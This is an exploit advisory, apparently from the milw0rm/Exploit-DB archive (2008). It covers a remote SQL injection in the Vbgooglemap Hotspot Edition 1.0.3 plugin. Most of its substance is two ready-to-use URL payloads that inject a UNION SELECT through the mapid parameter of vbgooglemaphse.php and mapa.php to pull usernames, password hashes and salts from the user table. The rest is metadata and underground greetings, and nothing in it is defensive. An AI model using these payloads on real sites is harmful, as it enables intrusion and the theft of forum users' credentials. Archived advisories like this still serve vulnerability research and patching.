Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection

EDB-ID:

6593


Author:

elusiven

Type:

webapps


Platform:

PHP

Date:

2008-09-27


#######################################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
#
#######################################################################

# Bug discovered by elusiven
# It was priv8

Bug: 

[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--

or:

[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--

# Special gr33tz for: my sweet Monia :*
# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT,
# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground.

#################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
#
#################################################

# milw0rm.com [2008-09-27]